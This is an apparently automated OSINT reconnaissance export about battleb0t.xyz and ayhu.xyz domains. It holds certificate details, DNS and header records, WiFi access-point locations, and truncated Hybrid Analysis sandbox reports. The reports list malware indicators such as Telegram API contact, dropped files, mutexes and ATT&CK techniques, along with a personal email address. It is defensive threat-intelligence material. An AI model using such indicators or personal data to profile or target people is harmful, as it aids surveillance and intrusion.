Digital Signature, Key Encipherment
X509v3 Extended Key Usage:
TLS Web Server Authentication, TLS Web Client Authentication
X509v3 Basic Constraints: critical
CA:FALSE
X509v3 Subject Key Identifier:
C8:7D:70:94:FD:01:EF:B0:A3:B3:C1:02:F1:32:C9:D5:2D:71:C9:73
X509v3 Authority Key Identifier:
keyid:14:2E:B3:17:B7:58:56:CB:AE:50:09:40:E6:1F:AF:9D:8B:14:C2:C6
Authority Information Access:
OCSP - URI:http://r3.o.lencr.org
CA Issuers - URI:http://r3.i.lencr.org/
X509v3 Subject Alternative Name:
DNS:kekw.battleb0t.xyz
X509v3 Certificate Policies:
Policy: 2.23.140.1.2.1
Policy: 1.3.6.1.4.1.44947.1.1.1
CPS: http://cps.letsencrypt.org
CT Precertificate Poison: critical
NULL
Signature Algorithm: sha256WithRSAEncryption
21:3b:56:fc:2b:9c:93:20:c1:2c:91:09:0d:ac:90:cb:0e:5c:
72:a2:ce:e5:13:5d:8c:49:8f:a0:ab:25:c3:01:70:a2:21:9b:
8b:b6:a5:f7:63:ac:53:cb:24:a6:ea:5e:26:dc:03:0c:34:93:
73:f1:ea:e9:83:ea:f0:f1:48:6c:3f:59:c0:85:06:54:41:39:
5b:b3:26:bb:7a:96:75:79:fe:94:2f:c7:2a:70:6e:62:2c:e5:
2b:cd:c4:cc:04:db:95:58:db:1b:87:6d:b6:6d:c8:2f:59:5b:
39:ce:0c:cc:c2:81:21:d5:39:65:f4:d2:81:33:62:bc:90:85:
91:2d:26:36:92:58:81:83:eb:0d:ef:49:b4:e4:7f:d5:0e:52:
0c:52:84:c3:8e:4d:32:02:c5:1e:50:b5:40:16:c2:b6:c6:6e:
3d:81:1a:b3:79:4c:24:0d:78:1b:2a:54:25:79:64:52:43:bf:
71:af:ac:4c:51:53:d6:09:ca:97:bf:92:2f:82:52:84:26:0d:
bf:e6:b9:bb:f6:11:a7:a2:20:01:a8:36:6d:46:b5:e4:bb:8e:
29:b6:1f:de:40:9e:e0:c3:15:57:b2:d7:4c:51:da:7a:e5:7e:
99:07:5f:64:ef:07:83:68:13:88:12:62:08:ba:bc:99:f4:d8:
79:5b:89:67
|
| 2023-05-12 03:01:33 | Blacklisted IP on Same Subnet | Yes | Honeypot Checker | 0 | 0 | 3 | 0 | None | Honeypotproject (188.114.97.88): Search Engine
Last Activity: 0 days ago
Threat Level: 29 | 188.114.97.0/24 |
| 2023-05-12 02:45:35 | Affiliate - Internet Name | No | DNS Raw Records | 1 | 0 | 1 | 0 | None | leanna.ns.cloudflare.com | ayhu.xyz |
| 2023-05-12 02:59:53 | Affiliate - Email Address | No | E-Mail Address Extractor | 0 | 0 | 3 | 0 | None | german.l@alliedglobal.com | [{u'subsystem': None, u'classification_tags': [], u'crowdstrike_ai': {u'executable_process_memory_analysis': [], u'analysis_related_urls': []}, u'total_processes': 16, u'threat_score': 100, u'compromised_hosts': [], u'environment_id': 160, u'major_os_version': None, u'submit_name': u'WAV-797251.html', u'signatures': [{u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-51', u'name': u'Queries DNS server', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071/004', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1071.004', u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"api.telegram.org"'}, {u'category': u'General', u'origin': u'Binary File', u'identifier': u'binary-16', u'name': u'Drops files marked as clean', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 10, u'threat_level': 0, u'type': 8, u'description': u'Antivirus vendors marked dropped file "widevinecdm.dll" as clean (type is "PE32+ executable (DLL) (console) x86-64 for MS Windows")'}, {u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-1', u'name': u'Contacts server', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1071', u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"104.22.59.100:443"\n "185.199.111.153:443"\n "13.227.74.44:443"\n "149.154.167.220:443"'}, {u'category': u'General', u'origin': u'Created Mutant', u'identifier': u'mutant-0', u'name': u'Creates mutants', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 3, u'threat_level': 0, u'type': 4, u'description': u'"\\Sessions\\1\\BaseNamedObjects\\Local\\SM0:8096:304:WilStaging_02"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\SM0:8096:120:WilError_01"\n "Local\\SM0:8096:120:WilError_01"\n "Local\\SM0:8096:304:WilStaging_02"\n "Local\\ChromeProcessSingletonStartup!"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\ChromeProcessSingletonStartup!"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\SM0:5004:304:WilStaging_02"\n "Local\\SM0:5004:304:WilStaging_02"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\SM0:3416:304:WilStaging_02"\n "Local\\SM0:3416:304:WilStaging_02"'}, {u'category': u'Unusual Characteristics', u'origin': u'Binary File', u'identifier': u'binary-35', u'name': u'Drops script files inside temp directory', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 5, u'threat_level': 0, u'type': 8, u'description': u'Dropped file: "product_page.js" - Location: [%TEMP%\\8096_1032656472\\product_page.js]- [targetUID: 00000000-00008096]\n Dropped file: "edge_tracking_page_validator.js" - Location: [%TEMP%\\8096_1032656472\\edge_tracking_page_validator.js]- [targetUID: 00000000-00008096]\n Dropped file: "auto_open_controller.js" - Location: [%TEMP%\\8096_1032656472\\auto_open_controller.js]- [targetUID: 00000000-00008096]\n Dropped file: "shopping_iframe_driver.js" - Location: [%TEMP%\\8096_1032656472\\shopping_iframe_driver.js]- [targetUID: 00000000-00008096]\n Dropped file: "shoppingfre.js" - Location: [%TEMP%\\8096_1032656472\\shoppingfre.js]- [targetUID: 00000000-00008096]\n Dropped file: "edge_confirmation_page_validator.js" - Location: [%TEMP%\\8096_1032656472\\edge_confirmation_page_validator.js]- [targetUID: 00000000-00008096]\n Dropped file: "edge_checkout_page_validator.js" - Location: [%TEMP%\\8096_1032656472\\edge_checkout_page_validator.js]- [targetUID: 00000000-00008096]\n Dropped file: "adblock_snippet.js" - Location: [%TEMP%\\8096_1534272233\\adblock_snippet.js]- [targetUID: 00000000-00008096]'}, {u'category': u'Installation/Persistence', u'origin': u'Binary File', u'identifier': u'binary-0', u'name': u'Dropped files', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1105', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1105', u'relevance': 3, u'threat_level': 0, u'type': 8, u'description': u'"widevinecdm.dll" has type "PE32+ executable (DLL) (console) x86-64 for MS Windows"- Location: [%PROGRAMFILES%\\(x86)\\Microsoft\\Edge\\Application\\103.0.1264.37\\WidevineCdm\\_platform_specific\\win_x64\\widevinecdm.dll]- [targetUID: 00000000-00008096]\n "000003.log" has type "data"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Default\\Sync Data\\LevelDB\\000003.log]- [targetUID: 00000000-00008096]\n "a369bab2-3926-4626-a576-669ff0c25556.tmp" has type "UTF-8 Unicode text with very long lines with no line terminators"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Default\\a369bab2-3926-4626-a576-669ff0c25556.tmp]- [targetUID: 00000000-00008096]\n "manifest.json" has type "JSON data"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\CertificateRevocation\\6498.2022.5.1\\manifest.json]- [targetUID: 00000000-00008096]\n "load_statistics.db-wal" has type "SQLite Write-Ahead Log version 3007000"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Default\\load_statistics.db-wal]- [targetUID: 00000000-00008096]\n "product_page.js" has type "UTF-8 Unicode text with very long lines with CRLF line terminators"- Location: [%TEMP%\\8096_1032656472\\product_page.js]- [targetUID: 00000000-00008096]\n "eaa46630-4898-435c-8b79-12a101475848.tmp" has type "UTF-8 Unicode text with very long lines with no line terminators"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Default\\eaa46630-4898-435c-8b79-12a101475848.tmp]- [targetUID: 00000000-00008096]\n "widevinecdm.dll.sig" has type "data"- Location: [%TEMP%\\8096_313714830\\_platform_specific\\win_x64\\widevinecdm.dll.sig]- [targetUID: 00000000-00008096]\n "77EC63BDA74BD0D0E0426DC8F8008506" has type "data"- Location: [%LOCALAPPDATA%\\ow\\Microsoft\\CryptnetUrlCache\\MetaData\\77EC63BDA74BD0D0E0426DC8F8008506]- [targetUID: 00000000-00008096]\n "cf602cb1-b95f-433b-8ffc-9eebfa799f0b.tmp" has type "ASCII text with very long lines with no line terminators"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Default\\Network\\cf602cb1-b95f-433b-8ffc-9eebfa799f0b.tmp]- [targetUID: 00000000-00003416]\n "edge_driver.js" has type "UTF-8 Unicode text with very long lines with CRLF line terminators"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Edge Shopping\\2.0.2353.0\\edge_driver.js]- [targetUID: 00000000-00008096]\n "7de6d455-5aa2-4101-812b-70e599317de8.tmp" has type "ASCII text with very long lines with no line terminators"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Default\\Network\\7de6d455-5aa2-4101-812b-70e599317de8.tmp]- [targetUID: 00000000-00003416]\n "4feeb93c-9f79-45f0-9ac6-0adffcb5a10a.tmp" has type "UTF-8 Unicode text with very long lines with no line terminators"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\4feeb93c-9f79-45f0-9ac6-0adffcb5a10a.tmp]- [targetUID: 00000000-00008096]\n "deny_domains.list" has type "data"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Web Notifications Deny List\\1.1.0.0\\deny_domains.list]- [targetUID: 00000000-00008096]\n "settings.dat" has type "data"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Crashpad\\settings.dat]- [targetUID: 00000000-00008096]\n "Last Browser" has type "data"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Last Browser]- [targetUID: 00000000-00008096]\n "1be98bdb-eeab-4983-9a3f-102d5eb80cfa.tmp" has type "JSON data"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Ad Blocking\\1be98bdb-eeab-4983-9a3f-102d5eb80cfa.tmp]- [targetUID: 00000000-00008096]\n "safety_tips.pb" has type "data"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\SafetyTips\\2844\\safety_tips.pb]- [targetUID: 00000000-00008096]\n "6419c6fb-280c-4dec-97ac-cbb742fa50bc.tmp" has type "UTF-8 Unicode text with very long lines with no line terminators"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\6419c6fb-280c-4dec-97ac-cbb742fa50bc.tmp]- [targetUID: 00000000-00008096]'}, {u'category': u'Installation/Persistence', u'origin': u'Binary File', u'identifier': u'binary-1', u'name': u'Drops executable files', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1105', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1105', u'relevance': 10, u'threat_level': 0, u'type': 8, u'description': u'"widevinecdm.dll" has type "PE32+ executable (DLL) (console) x86-64 for MS Windows"- Location: [%PROGRAMFILES%\\(x86)\\Microsoft\\Edge\\Application\\103.0.1264.37\\WidevineCdm\\_platform_specific\\win_x64\\widevinecdm.dll]- [targetUID: 00000000-00008096]'}, {u'category': u'Network Related', u'origin': u'File/Memory', u'identifier': u'string-3', u'name': u'Found potential URL in binary/memory', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 10, u'threat_level': 0, u'type': 2, u'description': u'Heuristic match: "jLP\',\'KDqei\',\'vXqYi\',\'GOqYh\',\'gISTU\',\'n()\\x20\',\'roJBb\',\'FXzcw\',\'__pro\',\'warn\',\'PukFk\',\'EAlzP\',\'YvMmB\',\'iiLHY\',\'tQrEe\',\'mGJfV\',\'strin\',\'pbBLV\',\'KlDNI\',\'nbsJn\',\'kVpKR\',\'BiHjg\',\'FNmxz\',\'sWuxZ\',\'ZOmpK\',\'om%2f\',\'FpgMT\',\'sjuIm\',\'style\',\'round\',\'EuVvW\',\'Qydgv\',\'s"\n Heuristic match: "api.telegram.org"\n Heuristic match: "l@allledglobal.com"\n Heuristic match: "german.l@alliedglobal.com"'}, {u'category': u'Network Related', u'origin': u'Network Traffic', u'identifier': u'network-54', u'name': u'Making HTTPS connections using secure TLS/SSL version', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1573', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1573', u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'Connection was make using TLSv1.2 [tls.handshake.version: 0x00000303]'}, {u'category': u'Network Related', u'origin': u'Network Traffic', u'identifier': u'network-38', u'name': u'Uses HTTPS for communication', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1573', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1573', u'relevance': 3, u'threat_level': 0, u'type': 7, u'description': |
| 2023-05-12 03:16:19 | Physical Location | No | ipapi.co | 1 | 0 | 2 | 0 | None | London, England, ENG, United Kingdom, GB | 2a06:98c1:3121::1 |
| 2023-05-12 03:09:41 | Affiliate - Internet Name | No | DNS Resolver | 0 | 0 | 4 | 0 | None | 123.48.229.35.bc.googleusercontent.com | 35.229.48.123 |
| 2023-05-12 02:57:58 | Raw Data from RIRs | No | Hybrid Analysis | 0 | 0 | 3 | 0 | None | [{u'subsystem': None, u'classification_tags': [], u'crowdstrike_ai': {u'executable_process_memory_analysis': [], u'analysis_related_urls': []}, u'total_processes': 3, u'threat_score': 35, u'compromised_hosts': [], u'environment_id': 100, u'major_os_version': None, u'submit_name': u'http://wifispeedtest.run/', u'signatures': [{u'category': u'General', u'origin': u'Created Mutant', u'identifier': u'mutant-0', u'name': u'Creates mutants', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 3, u'threat_level': 0, u'type': 4, u'description': u'"\\Sessions\\1\\BaseNamedObjects\\IsoScope_b20_IESQMMUTEX_0_519"\n "Local\\InternetShortcutMutex"\n "{5312EE61-79E3-4A24-BFE1-132B85B23C3A}"\n "Local\\VERMGMTBlockListFileMutex"\n "Local\\URLBLOCK_HASHFILESWITCH_MUTEX"\n "Local\\URLBLOCK_FILEMAPSWITCH_MUTEX_2848"\n "IsoScope_b20_IESQMMUTEX_0_519"\n "Local\\URLBLOCK_DOWNLOAD_MUTEX"\n "IsoScope_b20_IESQMMUTEX_0_303"\n "IsoScope_b20_IESQMMUTEX_0_331"\n "UpdatingNewTabPageData"\n "IsoScope_b20_ConnHashTable<2848>_HashTable_Mutex"\n "{66D0969A-1E86-44CF-B4EC-3806DDDA3B5D}"\n "Local\\ZonesCacheCounterMutex"\n "IsoScope_b20_IE_EarlyTabStart_0xbb4_Mutex"\n "Local\\!BrowserEmulation!SharedMemory!Mutex"\n "Local\\ZonesLockedCacheCounterMutex"\n "\\Sessions\\1\\BaseNamedObjects\\UpdatingNewTabPageData"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\!BrowserEmulation!SharedMemory!Mutex"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\VERMGMTBlockListFileMutex"'}, {u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-51', u'name': u'Queries DNS server', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071/004', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1071.004', u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"wifispeedtest.run"'}, {u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-0', u'name': u'Contacts domains', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"wifispeedtest.run"'}, {u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-1', u'name': u'Contacts server', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"34.148.97.127:80"\n "34.148.97.127:443"'}, {u'category': u'General', u'origin': u'Binary File', u'identifier': u'binary-16', u'name': u'Drops files marked as clean', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 10, u'threat_level': 0, u'type': 8, u'description': u'Antivirus vendors marked dropped file "urlblockindex_1_.bin" as clean (type is "data")\n Antivirus vendors marked dropped file "TarB619.tmp" as clean (type is "data")'}, {u'category': u'Unusual Characteristics', u'origin': u'Binary File', u'identifier': u'binary-5', u'name': u'Drops cabinet archive files', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 10, u'threat_level': 0, u'type': 8, u'description': u'"CabB618.tmp" has type "Microsoft Cabinet archive data 62397 bytes 1 file"\n "57C8EDB95DF3F0AD4EE2DC2B8CFD4157" has type "Microsoft Cabinet archive data 4817 bytes 1 file"\n "77EC63BDA74BD0D0E0426DC8F8008506" has type "Microsoft Cabinet archive data 62397 bytes 1 file"'}, {u'category': u'Unusual Characteristics', u'origin': u'Binary File', u'identifier': u'binary-37', u'name': u'Drops files inside appdata directory', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 5, u'threat_level': 0, u'type': 8, u'description': u'Dropped file: "LKV79Z5R.txt" - Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\LKV79Z5R.txt]- [targetUID: 00000000-00002848]\n Dropped file: "I7UUS2FD.txt" - Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\I7UUS2FD.txt]- [targetUID: 00000000-00002848]\n Dropped file: "DU53BF1Z.txt" - Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\DU53BF1Z.txt]- [targetUID: 00000000-00002848]'}, {u'category': u'Installation/Persistence', u'origin': u'Binary File', u'identifier': u'binary-0', u'name': u'Dropped files', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 3, u'threat_level': 0, u'type': 8, u'description': u'"urlblockindex_1_.bin" has type "data"- [targetUID: N/A]\n "6BADA8974A10C4BD62CC921D13E43B18_1DC6D7385EA816C957BA2B715AC5C442" has type "data"- Location: [%LOCALAPPDATA%\\ow\\Microsoft\\CryptnetUrlCache\\Content\\6BADA8974A10C4BD62CC921D13E43B18_1DC6D7385EA816C957BA2B715AC5C442]- [targetUID: 00000000-00002848]\n "_C99CEF31-40DD-11ED-ACE7-08002742885A_.dat" has type "Composite Document File V2 Document Cannot read section info"- [targetUID: N/A]\n "77EC63BDA74BD0D0E0426DC8F8008506" has type "data"- Location: [%LOCALAPPDATA%\\ow\\Microsoft\\CryptnetUrlCache\\MetaData\\77EC63BDA74BD0D0E0426DC8F8008506]- [targetUID: 00000000-00003528]\n "search_2_.json" has type "ASCII text with no line terminators"- [targetUID: N/A]\n "_D40FFDA2-40DD-11ED-ACE7-08002742885A_.dat" has type "Composite Document File V2 Document Cannot read section info"- [targetUID: N/A]\n "80237EE4964FC9C409AAF55BF996A292_D46D6FA25B74360E1349F9015B5CCE53" has type "data"- Location: [%LOCALAPPDATA%\\ow\\Microsoft\\CryptnetUrlCache\\MetaData\\80237EE4964FC9C409AAF55BF996A292_D46D6FA25B74360E1349F9015B5CCE53]- [targetUID: 00000000-00002848]\n "CabB618.tmp" has type "Microsoft Cabinet archive data 62397 bytes 1 file"- Location: [%TEMP%\\CabB618.tmp]- [targetUID: 00000000-00003528]\n "89E04DD615224FC07C7804BBADCE34B2" has type "data"- Location: [%LOCALAPPDATA%\\ow\\Microsoft\\CryptnetUrlCache\\MetaData\\89E04DD615224FC07C7804BBADCE34B2]- [targetUID: 00000000-00003528]\n "NewErrorPageTemplate_1_" has type "UTF-8 Unicode (with BOM) text with CRLF line terminators"- [targetUID: N/A]\n "search__0633EE93-D776-472f-A0FF-E1416B8B2E3A_.ico" has type "MS Windows icon resource - 1 icon 32x32 32 bits/pixel"- [targetUID: N/A]\n "7423F88C7F265F0DEFC08EA88C3BDE45_AA1E8580D4EBC816148CE81268683776" has type "data"- Location: [%LOCALAPPDATA%\\ow\\Microsoft\\CryptnetUrlCache\\MetaData\\7423F88C7F265F0DEFC08EA88C3BDE45_AA1E8580D4EBC816148CE81268683776]- [targetUID: 00000000-00002848]\n "57C8EDB95DF3F0AD4EE2DC2B8CFD4157" has type "Microsoft Cabinet archive data 4817 bytes 1 file"- Location: [%LOCALAPPDATA%\\ow\\Microsoft\\CryptnetUrlCache\\Content\\57C8EDB95DF3F0AD4EE2DC2B8CFD4157]- [targetUID: 00000000-00002848]\n "TarB619.tmp" has type "data"- Location: [%TEMP%\\TarB619.tmp]- [targetUID: 00000000-00003528]\n "RecoveryStore._88B090C0-D917-11E7-B67B-080027A49DD6_.dat" has type "Composite Document File V2 Document Cannot read section info"- [targetUID: N/A]\n "ZTHQHHIZ.txt" has type "ASCII text with no line terminators"- Location: [%LOCALAPPDATA%\\Microsoft\\Windows\\Temporary Internet Files\\Content.IE5\\37NU00GP\\ZTHQHHIZ.txt]- [targetUID: 00000000-00003528]\n "~DF48C297BD3AF92F27.TMP" has type "data"- Location: [%TEMP%\\~DF48C297BD3AF92F27.TMP]- [targetUID: 00000000-00002848]'}, {u'category': u'Network Related', u'origin': u'File/Memory', u'identifier': u'string-102', u'name': u'Decrypted SSL network traffic', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1573', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1573', u'relevance': 3, u'threat_level': 0, u'type': 2, u'description': u'"GET / HTTP/1.1\nAccept: text/html, application/xhtml+xml, */*\nAccept-Language: en-US\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko\nAccept-Encoding: gzip, deflate\nDNT: 1\nConnection: Keep-Alive\nHost: wifispeedtest.run"'}, {u'category': u'Network Related', u'origin': u'File/Memory', u'identifier': u'string-3', u'name': u'Found potential URL in binary/memory', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 10, u'threat_level': 0, u'type': 2, u'description': u'Pattern match: "http://wifispeedtest.run/"\n Pattern match: "http://wifispeedtest.run"'}, {u'category': u'Network Related', u'origin': u'Network Traffic', u'identifier': u'network-22', u'name': u'Uses a User Agent typical for browsers, although no browser was ever launched', u'attck_id_wiki': None, u'threat_level_human': u'suspicious', u'capec_id': None, u'attck_id': None, u'relevance': 10, u'threat_level': 1, u'type': 7, u'description': u'Found user agent(s): Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko'}, {u'category': u'External Systems', u'origin': u'External System', u'identifier': u'avtest-0', u'name': u'Sample was identified as malicious by at least one Antivirus engine', u'attck_id_wiki': None, u'threat_level_human': u'suspicious', u'capec_id': None, u'attck_id': None, u'relevance': 0, u'threat_level': 1, u'type': 12, u'description': u'1/88 Antivirus vendors marked sample as malicious (1% detection rate)'}], u'threat_level': 1, u'size': None, u'job_id': u'6337364c4440b66f39537654', u'target_url': None, u'interesting': False, u'error_type': None, u'state': u'SUCCESS', u'entrypoint': None, u'mitre_attcks': [{u'parent': None, u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1573', u'suspicious_identifiers': [], u'attck_id': u'T1573', u'malicious_identifiers': [], u'malicious_identifiers_count': 0, u'technique': u'Encrypted Channel', u'informative_identifiers': [], u'tactic': u'Command and Control', u'informative_identifiers_count': 1, u'suspicious_identifiers_count': 0}, {u'parent': {u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071', u'technique': u'Application Layer Protocol', u'attck_id': u'T1071'}, u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071/004', u'suspicious_identifiers': [], u'attck_id': u'T1071.004', u'malicious_identifiers': [], u'malicious_identifiers_count': 0, u'technique': u'DNS', u'informative_identifiers': [], u'tactic': u'Command and Control', u'informative_identifiers_count': 1, u'suspicious_identif | 34.148.97.127 |
| 2023-05-12 03:18:54 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 4 | 0 | None | danny (Net ID: 00:01:E3:02:5D:60) | 50.1188, 8.6843 |
| 2023-05-12 03:42:18 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 4 | 0 | None | Eminent (Net ID: 00:14:5C:88:50:78) | 50.8897, 6.0563 |
| 2023-05-12 03:24:21 | HTTP Headers | No | Web Spider | 10 | 0 | 3 | 0 | None | {"content-encoding": "gzip", "nel": "{\"success_fraction\":0,\"report_to\":\"cf-nel\",\"max_age\":604800}", "referrer-policy": "same-origin", "permissions-policy": "accelerometer=(),autoplay=(),camera=(),clipboard-read=(),clipboard-write=(),fullscreen=(),geolocation=(),gyroscope=(),hid=(),interest-cohort=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=()", "cross-origin-resource-policy": "same-origin", "transfer-encoding": "chunked", "alt-svc": "h3=\":443\"; ma=86400, h3-29=\":443\"; ma=86400", "expires": "Thu, 01 Jan 1970 00:00:01 GMT", "vary": "Accept-Encoding", "server": "cloudflare", "connection": "close", "report-to": "{\"endpoints\":[{\"url\":\"https:\\/\\/a.nel.cloudflare.com\\/report\\/v3?s=fJBUelNZ98yfCYgTc7WNhjysoMluqrTDHq0SVIO%2F0YIAsdqyzhnqcXYutPnufmVGlk%2F%2BT8t3g7wQdFh43VhAxqE%2FmCarJp88icmjJuhwuBRUeOwsppojYEabsQ%3D%3D\"}],\"group\":\"cf-nel\",\"max_age\":604800}", "cf-mitigated": "challenge", "cache-control": "private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0", "date": "Fri, 12 May 2023 03:24:21 GMT", "x-frame-options": "SAMEORIGIN", "cross-origin-embedder-policy": "require-corp", "content-type": "text/html; charset=UTF-8", "cf-ray": "7c5f8c59d97743e3-EWR", "cross-origin-opener-policy": "same-origin"} | https://ayhu.xyz/lol.html?__cf_chl_f_tk=74dxVi7F6QcjSPoVNIU8T6Tlsy4wHV.ukI6aTAD9tk4-1683861861-0-gaNycGzNCiU |
| 2023-05-12 02:55:05 | HTTP Headers | No | Censys | 0 | 0 | 2 | 0 | None | {"Content_Length": ["151"], "_encoding": {"Content_Length": "DISPLAY_UTF8", "Server": "DISPLAY_UTF8", "Cf_Ray": "DISPLAY_UTF8", "Connection": "DISPLAY_UTF8", "Content_Type": "DISPLAY_UTF8", "Date": "DISPLAY_UTF8"}, "Server": ["cloudflare"], "Cf_Ray": ["7c5ad9968f0b1cf4-ORD"], "Connection": ["keep-alive"], "Content_Type": ["text/html"], "Date": ["<REDACTED>"]} | 188.114.97.1 |
| 2023-05-12 03:18:57 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 5 | 0 | None | linksys (Net ID: 00:01:24:F2:17:BC) | 37.780462,-122.390564 |
| 2023-05-12 02:46:18 | Affiliate Description - Category | No | DuckDuckGo | 0 | 0 | 2 | 0 | None | Freedom of speech in the United States | skip.ns.cloudflare.com |
| 2023-05-12 03:23:21 | Open TCP Port | No | Pulsedive | 0 | 0 | 3 | 0 | None | 188.114.96.6:80 | 188.114.96.0/24 |
| 2023-05-12 02:54:20 | Linked URL - Internal | No | Web Spider | 0 | 0 | 3 | 0 | None | https://funny.battleb0t.xyz/images/random_4.png | https://funny.battleb0t.xyz/ |
| 2023-05-12 02:47:20 | Raw Data from RIRs | No | Hybrid Analysis | 0 | 0 | 2 | 0 | None | [{u'subsystem': None, u'classification_tags': [], u'crowdstrike_ai': {u'executable_process_memory_analysis': [], u'analysis_related_urls': []}, u'total_processes': 2, u'threat_score': 100, u'compromised_hosts': [u'185.199.108.153'], u'environment_id': 110, u'major_os_version': None, u'submit_name': u'README.md', u'signatures': [{u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-51', u'name': u'Queries DNS server', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071/004', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1071.004', u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"ruffle.rs"'}, {u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-1', u'name': u'Contacts server', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1071', u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"172.64.192.12:443"\n "185.199.108.153:443"'}, {u'category': u'General', u'origin': u'Binary File', u'identifier': u'binary-16', u'name': u'Drops files marked as clean', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 10, u'threat_level': 0, u'type': 8, u'description': u'Antivirus vendors marked dropped file "logo_1_.svg" as clean (type is "SVG Scalable Vector Graphics image")\n Antivirus vendors marked dropped file "urlblockindex_1_.bin" as clean (type is "data")\n Antivirus vendors marked dropped file "Tar1CC1.tmp" as clean (type is "data")\n Antivirus vendors marked dropped file "Tar1C90.tmp" as clean (type is "data")\n Antivirus vendors marked dropped file "Tar1AFD.tmp" as clean (type is "data")\n Antivirus vendors marked dropped file "Tar1CC0.tmp" as clean (type is "data")'}, {u'category': u'General', u'origin': u'Created Mutant', u'identifier': u'mutant-0', u'name': u'Creates mutants', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 3, u'threat_level': 0, u'type': 4, u'description': 